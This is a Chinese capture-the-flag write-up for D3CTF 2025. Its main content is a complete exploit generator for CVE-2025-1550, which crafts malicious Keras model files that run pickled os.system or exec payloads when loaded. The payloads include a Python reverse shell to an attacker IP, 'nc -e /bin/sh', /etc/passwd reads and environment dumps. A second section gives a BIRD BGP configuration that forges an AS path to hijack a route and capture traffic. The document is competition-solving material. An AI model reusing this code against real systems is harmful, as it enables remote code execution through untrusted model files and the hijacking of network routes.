文章

D3CTF 2025 wp

前言

队伍里出了点小事情,具体请看下方链接

关于MNGA在D3CTF 2025被禁赛的情况说明

d3model

打CVE-2025-1550,应该是pickle反序列化

相关文章

《Inside CVE-2025-1550:通过 Keras 模型进行远程代码执行》 --- Inside CVE-2025-1550: Remote Code Execution via Keras Models

由于题目环境不出网,可以把命令输出写进 index.html,再通过访问网页来回显

最终exp如下(来自Q7师傅)

#!/usr/bin/env python3
"""
Utility functions for Keras NPZ pickle exploitation
"""

import pickle
import os
import subprocess
from keras.src.saving import saving_lib

class PayloadGenerator:
    """Factories for objects whose ``__reduce__`` describes a call.

    Every factory returns an instance of a small local class.  Pickling
    such an instance stores the ``(callable, args)`` pair returned by its
    ``__reduce__``; unpickling invokes ``callable(*args)``.  The local
    classes themselves are never pickled, so defining them inside the
    factories is fine.

    Values passed to the factories are interpolated into shell command
    strings verbatim (no quoting is applied).
    """

    @staticmethod
    def command_execution(command):
        """Return a payload that calls ``os.system(command)``."""
        class CommandExecution:
            def __reduce__(self):
                return (os.system, (command,))
        return CommandExecution()

    @staticmethod
    def reverse_shell(ip, port):
        """Return a payload that runs a ``python -c`` connect-back one-liner.

        Args:
            ip: Host the one-liner connects to.
            port: TCP port the one-liner connects to.
        """
        class ReverseShell:
            def __reduce__(self):
                # The inner double quotes are escaped once (\"); a doubled
                # backslash here would terminate the f-string early and
                # make the whole module fail to parse.
                command = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
                return (os.system, (command,))
        return ReverseShell()

    @staticmethod
    def file_read(file_path, output_path="/tmp/flag_output"):
        """Return a payload that runs ``cat file_path > output_path``."""
        class FileRead:
            def __reduce__(self):
                command = f"cat {file_path} > {output_path}"
                return (os.system, (command,))
        return FileRead()

    @staticmethod
    def file_write(content, file_path):
        """Return a payload that runs ``echo 'content' > file_path``."""
        class FileWrite:
            def __reduce__(self):
                command = f"echo '{content}' > {file_path}"
                return (os.system, (command,))
        return FileWrite()

    @staticmethod
    def environment_dump(output_path="/tmp/env_dump"):
        """Return a payload that runs ``env > output_path``."""
        class EnvDump:
            def __reduce__(self):
                command = f"env > {output_path}"
                return (os.system, (command,))
        return EnvDump()

    @staticmethod
    def directory_listing(directory="/", output_path="/tmp/dir_listing"):
        """Return a payload that runs ``ls -la directory > output_path``."""
        class DirList:
            def __reduce__(self):
                command = f"ls -la {directory} > {output_path}"
                return (os.system, (command,))
        return DirList()

    @staticmethod
    def python_code_execution(code):
        """Return a payload that calls the builtin ``exec(code)``."""
        class PythonExec:
            def __reduce__(self):
                return (exec, (code,))
        return PythonExec()

def create_custom_payload():
    """Interactively build a payload object from a numbered menu.

    Prompts on stdin for the payload type and its parameters, then
    delegates to the matching ``PayloadGenerator`` factory.

    Returns:
        The payload object produced by the selected factory, or ``None``
        when the menu choice is not 1-7 or the entered port is not an
        integer in the range 1-65535.
    """
    print("=== Custom Payload Generator ===")
    print("Select payload type:")
    print("1. Command execution")
    print("2. Reverse shell")
    print("3. File read")
    print("4. File write")
    print("5. Environment dump")
    print("6. Directory listing")
    print("7. Python code execution")

    choice = input("Enter choice (1-7): ").strip()

    if choice == "1":
        command = input("Enter command to execute: ")
        return PayloadGenerator.command_execution(command)

    if choice == "2":
        ip = input("Enter attacker IP: ")
        port_text = input("Enter port: ").strip()
        # Validate instead of letting int() raise ValueError and abort the
        # whole interactive session on a typo.
        try:
            port = int(port_text)
        except ValueError:
            print(f"Invalid port: {port_text!r}")
            return None
        if not 1 <= port <= 65535:
            print(f"Invalid port: {port_text!r}")
            return None
        return PayloadGenerator.reverse_shell(ip, port)

    if choice == "3":
        file_path = input("Enter file path to read: ")
        # Empty input falls back to the documented default.
        output_path = input("Enter output path (default: /tmp/flag_output): ") or "/tmp/flag_output"
        return PayloadGenerator.file_read(file_path, output_path)

    if choice == "4":
        content = input("Enter content to write: ")
        file_path = input("Enter output file path: ")
        return PayloadGenerator.file_write(content, file_path)

    if choice == "5":
        output_path = input("Enter output path (default: /tmp/env_dump): ") or "/tmp/env_dump"
        return PayloadGenerator.environment_dump(output_path)

    if choice == "6":
        directory = input("Enter directory to list (default: /): ") or "/"
        output_path = input("Enter output path (default: /tmp/dir_listing): ") or "/tmp/dir_listing"
        return PayloadGenerator.directory_listing(directory, output_path)

    if choice == "7":
        code = input("Enter Python code to execute: ")
        return PayloadGenerator.python_code_execution(code)

    print("Invalid choice")
    return None

def test_payload_locally(payload):
    """Round-trip *payload* through pickle in this process, after confirmation.

    WARNING: unpickling invokes whatever callable the payload's
    ``__reduce__`` returns, on the local machine.  Nothing happens unless
    the user answers ``y`` at the prompt.

    Args:
        payload: Object to serialize with ``pickle.dumps`` and load back
            with ``pickle.loads``.
    """
    print("\n[WARNING] This will execute the payload locally!")
    print("Make sure you understand what it does before proceeding.")

    response = input("Continue with local test? (y/N): ")
    if response.lower() != 'y':
        print("Test cancelled.")
        return

    try:
        pickled = pickle.dumps(payload)
        print("[+] Payload serialized successfully")

        print("[+] Executing payload...")
        # Deliberate: loading is the test.  The return value is irrelevant,
        # only the side effect of the reduce callable matters.
        pickle.loads(pickled)
        print("[+] Payload executed!")

    except Exception as e:
        # Broad on purpose: the reduce callable can raise anything, and this
        # is an interactive helper that should report rather than crash.
        print(f"[!] Error: {e}")

def analyze_keras_file(filename):
    """Print the members of a ``.keras`` archive with their sizes.

    The file is opened as a ZIP archive.  Members ending in ``.npz`` and
    ``.json`` get an extra annotation line.  Any failure (missing file,
    not a ZIP, ...) is reported on stdout instead of being raised.

    Args:
        filename: Path of the archive to inspect.
    """
    import zipfile

    try:
        with zipfile.ZipFile(filename, 'r') as zf:
            print(f"\n=== Analysis of {filename} ===")
            print("Files in archive:")
            for info in zf.infolist():
                print(f"  {info.filename} ({info.file_size} bytes)")

                if info.filename.endswith('.npz'):
                    print("    -> NPZ file detected (target for injection)")
                elif info.filename.endswith('.json'):
                    print("    -> Configuration file")

    except Exception as e:
        # Best-effort CLI helper: report the problem and return.
        print(f"Error analyzing file: {e}")

def create_custom_exploit():
    """Build ``custom_exploit.keras`` around an interactively chosen payload.

    Steps:
      1. Ask the user for a payload via ``create_custom_payload``; stop if
         none is returned.
      2. Save a base model to ``custom_temp.keras`` with NPZ weights.
      3. Serialize the payload into an in-memory NPZ under the key
         ``__root__``.
      4. Copy the saved archive to ``custom_exploit.keras``, substituting
         every ``.npz`` member with that NPZ.
      5. Optionally hand the payload to ``test_payload_locally``.

    The intermediate ``custom_temp.keras`` is removed even if a step fails.
    """
    from refined_exploit import create_base_keras_model
    import io
    import zipfile
    import numpy as np

    print("=== Custom Exploit Creator ===")

    payload = create_custom_payload()
    if not payload:
        return

    print("\n[+] Creating base Keras model...")
    model = create_base_keras_model()

    temp_path = 'custom_temp.keras'
    output_file = 'custom_exploit.keras'

    try:
        # model.save(temp_path, weights_format='npz') is not used here;
        # saving_lib.save_model takes weights_format directly.
        saving_lib.save_model(model, temp_path, weights_format='npz')

        print("[+] Creating malicious NPZ with custom payload...")
        # Build the NPZ in memory: no on-disk temp file to leak on error,
        # and no reopening of a still-open NamedTemporaryFile by name
        # (which fails on Windows).
        npz_buffer = io.BytesIO()
        np.savez(npz_buffer, __root__=payload)
        malicious_npz = npz_buffer.getvalue()

        with zipfile.ZipFile(temp_path, 'r') as original, \
                zipfile.ZipFile(output_file, 'w') as new_zip:
            for item in original.infolist():
                if item.filename.endswith('.npz'):
                    new_zip.writestr(item.filename, malicious_npz)
                else:
                    new_zip.writestr(item.filename, original.read(item.filename))
    finally:
        # Always drop the intermediate archive, including on failure.
        if os.path.exists(temp_path):
            os.remove(temp_path)

    print(f"[+] Custom exploit created: {output_file}")

    test_choice = input("\nTest payload locally? (y/N): ")
    if test_choice.lower() == 'y':
        test_payload_locally(payload)

# Interactive entry point: pick one of the utilities defined in this file.
if __name__ == "__main__":
    print("=== Keras NPZ Exploit Utilities ===")
    print("1. Create custom exploit")
    print("2. Test payload locally")
    print("3. Analyze .keras file")
    print("4. Generate common payloads")

    choice = input("\nSelect option (1-4): ").strip()

    if choice == "1":
        create_custom_exploit()

    elif choice == "2":
        payload = create_custom_payload()
        if payload:
            test_payload_locally(payload)

    elif choice == "3":
        filename = input("Enter .keras file path: ")
        analyze_keras_file(filename)

    elif choice == "4":
        print("\n=== Common CTF Payloads ===")
        # Show the command each sample wraps.  Printing the payload object
        # itself only yields its default "<... object at 0x...>" repr.
        samples = (
            ("Command execution", PayloadGenerator.command_execution("whoami")),
            ("File read", PayloadGenerator.file_read("/etc/passwd")),
            ("Environment dump", PayloadGenerator.environment_dump()),
            ("Directory listing", PayloadGenerator.directory_listing("/")),
        )
        for label, sample in samples:
            # __reduce__ returns (callable, (command,)) for these payloads.
            _, (shell_command,) = sample.__reduce__()
            print(f"{label}: {shell_command}")

    else:
        print("Invalid choice")
#!/usr/bin/env python3
import keras
import tensorflow as tf
import numpy as np
import pickle
import zipfile
import io
import os
import tempfile

def create_malicious_payload():
    """Return an object whose ``__reduce__`` yields ``(os.system, (cmd,))``.

    The command is fixed in this function; edit ``shell_command`` to use a
    different one.  As shipped it only writes a marker line to
    ``/tmp/keras_pwned``.
    """
    import os

    # Alternatives mentioned by the original author:
    #   file creation: "touch /tmp/exploited"
    #   reverse shell: "nc -e /bin/sh attacker_ip port"
    #   flag reading:  "cat /flag > /tmp/flag_output"
    shell_command = "echo 'RCE via Keras NPZ pickle exploit' > /tmp/keras_pwned"

    class RCE:
        def __reduce__(self):
            return os.system, (shell_command,)

    return RCE()

def _npy_bytes(array):
    """Serialize *array* to NPY-format bytes using ``np.save``."""
    npy_buffer = io.BytesIO()
    np.save(npy_buffer, array, allow_pickle=True)
    return npy_buffer.getvalue()


def create_poisoned_npz_data():
    """Return the bytes of an NPZ archive holding weights plus one object array.

    The archive contains four random float32 arrays (``dense_kernel``,
    ``dense_bias``, ``dense_1_kernel``, ``dense_1_bias``) and a member
    ``malicious_weight.npy``: a 0-d object array wrapping the object from
    ``create_malicious_payload``.  NumPy stores object arrays with pickle.

    Every member is written by ``np.save`` so it follows the NPY format.
    The previous hand-assembled member was malformed: wrong magic bytes, a
    JSON-style header (``false``, double quotes) where a Python literal is
    required, and no terminating newline.

    Returns:
        bytes: The complete ZIP/NPZ archive.
    """
    weights = {
        'dense_kernel': np.random.random((4, 10)).astype(np.float32),
        'dense_bias': np.random.random((10,)).astype(np.float32),
        'dense_1_kernel': np.random.random((10, 1)).astype(np.float32),
        'dense_1_bias': np.random.random((1,)).astype(np.float32)
    }

    payload = create_malicious_payload()

    # Fill a 0-d object array by index so NumPy never tries to interpret
    # the payload object as a sequence.
    payload_array = np.empty((), dtype=object)
    payload_array[()] = payload

    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
        for name, array in weights.items():
            zf.writestr(f'{name}.npy', _npy_bytes(array))

        zf.writestr('malicious_weight.npy', _npy_bytes(payload_array))

    return buffer.getvalue()

def create_base_keras_model():
    """Build and return an uncompiled, untrained one-layer Sequential model.

    The model consists of a single ``Dense`` layer named ``dense`` with 10
    units, ReLU activation and ``input_shape=(4,)``.  A second layer,
    compilation and a one-epoch dummy fit were tried by the original author
    and are intentionally left out.
    """
    dense = keras.layers.Dense(
        10,
        activation='relu',
        input_shape=(4,),
        name='dense',
    )
    return keras.Sequential([dense])

def create_malicious_keras_model():
    """Write ``malicious_model.keras`` and return its file name.

    Saves the base model to ``temp_model.keras``, then copies that archive
    member by member into ``malicious_model.keras``, replacing any member
    whose name ends in ``model.weights.npz`` with the bytes returned by
    ``create_poisoned_npz_data``.  The intermediate file is removed even if
    a step fails.

    Returns:
        str: ``'malicious_model.keras'``.
    """
    print("[+] Creating base Keras model...")
    model = create_base_keras_model()

    temp_model_path = 'temp_model.keras'
    output_path = 'malicious_model.keras'

    try:
        print("[+] Saving model with NPZ weights...")
        # NOTE(review): confirm that Model.save() in the targeted Keras
        # version accepts `weights_format`; if it rejects the keyword,
        # this call needs a different save entry point.
        model.save(temp_model_path, save_format='keras', weights_format='npz')

        print("[+] Creating malicious NPZ payload...")
        malicious_npz = create_poisoned_npz_data()

        print("[+] Injecting malicious NPZ into .keras file...")

        with zipfile.ZipFile(temp_model_path, 'r') as original, \
                zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as malicious:
            for filename in original.namelist():
                if filename.endswith('model.weights.npz'):
                    print(f"[+] Replacing {filename} with malicious NPZ")
                    malicious.writestr(filename, malicious_npz)
                else:
                    # Everything else is copied through unchanged.
                    malicious.writestr(filename, original.read(filename))
    finally:
        # Do not leave the intermediate archive behind on failure.
        if os.path.exists(temp_model_path):
            os.remove(temp_model_path)

    print("[+] Malicious model created: malicious_model.keras")
    return output_path

def create_simple_exploit():
    """Write ``simple_exploit.keras`` and return its file name.

    Saves a minimal compiled model to ``simple_model.keras``, builds an NPZ
    in memory containing ``legitimate_data`` (a small integer array) and
    ``malicious_object`` (the object from ``create_malicious_payload``,
    stored by NumPy as a pickled object array), and copies the saved archive
    to ``simple_exploit.keras`` with every ``.npz`` member replaced by that
    NPZ.  The intermediate ``simple_model.keras`` is removed even if a step
    fails.

    Returns:
        str: ``'simple_exploit.keras'``.
    """
    print("[+] Creating simple exploit model...")

    model = keras.Sequential([keras.layers.Dense(1, input_shape=(1,))])
    model.compile(optimizer='adam', loss='mse')

    temp_model_path = 'simple_model.keras'
    output_path = 'simple_exploit.keras'

    try:
        # NOTE(review): confirm that Model.save() in the targeted Keras
        # version accepts `weights_format`.
        model.save(temp_model_path, weights_format='npz')

        payload = create_malicious_payload()

        # In-memory NPZ: avoids a delete=False temp file that leaked on
        # error and was reopened by name while still open (fails on Windows).
        npz_buffer = io.BytesIO()
        np.savez(npz_buffer,
                 legitimate_data=np.array([1, 2, 3]),
                 malicious_object=payload)
        malicious_npz_data = npz_buffer.getvalue()

        with zipfile.ZipFile(temp_model_path, 'r') as original, \
                zipfile.ZipFile(output_path, 'w') as new_zip:
            for item in original.infolist():
                if item.filename.endswith('.npz'):
                    new_zip.writestr(item.filename, malicious_npz_data)
                else:
                    new_zip.writestr(item.filename, original.read(item.filename))
    finally:
        if os.path.exists(temp_model_path):
            os.remove(temp_model_path)

    print("[+] Simple exploit created: simple_exploit.keras")
    return output_path

def main():
    """Generate both archive variants and print a usage summary.

    Calls ``create_malicious_keras_model`` and ``create_simple_exploit`` in
    that order, then prints the resulting file names together with usage and
    customization notes.
    """
    print("=== Keras NPZ Pickle Deserialization Exploit Generator ===")
    print()
    print("This script creates malicious Keras models that exploit pickle")
    print("deserialization vulnerabilities in the NPZ weight loading process.")
    print()

    print("Creating exploits...")

    exploit1 = create_malicious_keras_model()
    exploit2 = create_simple_exploit()

    # A real newline before the separator; the doubled backslash printed a
    # literal "\n" in front of it.
    print("\n" + "="*60)
    print("EXPLOIT FILES CREATED:")
    print(f"1. {exploit1} - Advanced NPZ injection")
    print(f"2. {exploit2} - Simple NPZ replacement")
    print()
    print("USAGE:")
    print("1. Upload either file to the target Flask application")
    print("2. The exploit triggers when keras.models.load_model() is called")
    print("3. Current payload: Creates /tmp/keras_pwned file")
    print()
    print("CUSTOMIZATION:")
    print("- Modify create_malicious_payload() for custom commands")
    print("- Common CTF payloads:")
    print("  * File read: 'cat /flag > /tmp/flag'")
    print("  * Reverse shell: 'nc -e /bin/sh IP PORT'")
    print("  * Command execution: Any shell command")
    print()
    print("WARNING: These files contain malicious code!")


if __name__ == "__main__":
    main()

选择 7(Python code execution),然后输入 import os;os.system("env > index.html"),生成 .keras 文件并上传,最后刷新网页即可拿到 flag

d3RPKI

  • t1(AS4211110001):运行 RPKI 服务器,连接多个网络,包括 nw0(10.0.0.1)。

  • t2-1(AS4211110002):控制的节点,连接 nw0(10.0.0.2)和外部网络,运行 BIRD 协议,开放 SSH。

  • t2-2(AS4211110003):定期向 10.4.0.5:1234 发送 FLAG。

  • t2-3(AS4211110004):连接 nw2 和 subnet4(10.4.0.1)。

# Static protocol attached to BGP_table: its routes are imported into that
# table (import all) and nothing is exported back to the protocol.
protocol static {
    ipv4 {
        table BGP_table;
        import all;
        export none;
    };
    # Static reject route for 10.4.0.5/32 (the address the FLAG is sent to).
    # Its only purpose is to exist in BGP_table so it can be announced.
    route 10.4.0.5/32 reject;
}

在 t2-1 的路由表中注入一个静态路由 10.4.0.5/32,状态为 reject

虽然路由被标记为不可达,但它会被注入到 BGP_table 中,并通过 BGP 协议向外宣布

# BGP template shared by peers; routes are taken from BGP_table.
template bgp BGP_peers {
    ipv4 {
        table BGP_table;
        export filter {
            # For 10.4.0.5/32 only: clear the AS path and prepend
            # 4211110004 before announcing the route.
            if net = 10.4.0.5/32 then {
                bgp_path.empty;
                bgp_path.prepend(4211110004);
                accept;
            }
            # All other static and BGP routes are exported unchanged.
            if source ~ [RTS_STATIC, RTS_BGP] then accept;
            reject;
        };
    };
}

# BGP session from this node (10.0.0.2, AS4211110002) to t1
# (10.0.0.1, AS4211110001), using the template above.
protocol bgp t1 from BGP_peers {
    local 10.0.0.2 as 4211110002;
    neighbor 10.0.0.1 as 4211110001;
}

t2-1 向 t1 宣布 10.4.0.5/32 的路由时,AS 路径被伪造成 [4211110004],像是从 AS4211110004(t2-3)发起的

t1 验证后接受此路由,并将其传播给网络中的其他节点,t2-2 更新其路由表,认为 10.4.0.5 可以通过 t1 到达,最终流量会到达t2-1

将 10.4.0.5 的 IP 地址绑定到 t2-1 的接口,并监听 1234 端口,即可拿到flag

完整解法如下:

首先修改/etc/bird/bird.conf

# Full /etc/bird/bird.conf for t2-1 (AS4211110002).
log syslog all;
debug protocols all;

router id 10.2.0.1;

# Dedicated table for BGP routes, separate from master4.
ipv4 table BGP_table;

protocol device {
}

# Kernel protocol: exports BIRD routes to the kernel, imports none from it.
protocol kernel {
    scan time 10;
    ipv4 {
        export all;
        import none;
    };
}

# Static routes placed into BGP_table so the BGP export filter can announce them.
protocol static {
    ipv4 {
        table BGP_table;
        import all;
        export none;
    };
    route 10.2.0.0/24 reject;
    # Added for the attack: the /32 of the FLAG receiver.
    route 10.4.0.5/32 reject;
}

# ROA table filled by the RPKI protocol below.
roa4 table r4;

# RPKI session to the server at 10.0.0.1:8083; received ROAs go into r4.
protocol rpki {
    debug all;
    roa4 { table r4; };
    remote "10.0.0.1" port 8083;
    retry keep 5;
    refresh keep 30;
    expire 600;
}

template bgp BGP_peers {
    ipv4 {
        table BGP_table;
        # Inbound: reject any route whose ROA check, done against the last
        # ASN in its AS path, is not ROA_VALID.
        import filter {
            if roa_check(r4, net, bgp_path.last) !~ [ROA_VALID] then {
                print "ROA check failed for ", net, " ASN ", bgp_path.last;
                reject;
            }
            accept;
        };
        # Outbound: 10.4.0.5/32 is announced with its AS path replaced by
        # the single ASN 4211110004; other static/BGP routes pass unchanged.
        export filter {
            if net = 10.4.0.5/32 then {
                bgp_path.empty;
                bgp_path.prepend(4211110004);
                accept;
            }
            if source ~ [RTS_STATIC, RTS_BGP] then accept;
            reject;
        };
    };
}

# Pipe between master4 and BGP_table. The import filter drops static routes
# and sets krt_prefsrc on the rest; nothing is exported in the other direction.
# NOTE(review): presumably "import" here means BGP_table -> master4 - confirm
# against the BIRD pipe documentation.
protocol pipe {
    table master4;
    peer table BGP_table;
    import filter {
        if source = RTS_STATIC then reject;
        krt_prefsrc = 10.2.0.1;
        accept;
    };
    export none;
}

# BGP session to t1 (10.0.0.1, AS4211110001).
protocol bgp t1 from BGP_peers {
    local 10.0.0.2 as 4211110002;
    neighbor 10.0.0.1 as 4211110001;
}

然后运行命令即可

Last login: Tue May 20 10:43:49 2025 from 100.64.5.2
root@b04002374330:~# service bird restart
 * Restarting BIRD Internet Routing Daemon bird                                  [ OK ] 
root@b04002374330:~# ip addr add 10.4.0.5/32 dev eth0
root@b04002374330:~# nc -l 10.4.0.5 1234
d3ctf{c9780467-2ff8-4ccf-96e1-49b36e3f6822}

D^3Rpg - Signin

一开始跟着解misc

后面发现钱数刷满128就会给flag

解码出来W3lc0m3_7o_d3_RpG_W0r1d

le0n师傅这次太强了

几乎把web方向给ak了

许可协议:  CC BY 4.0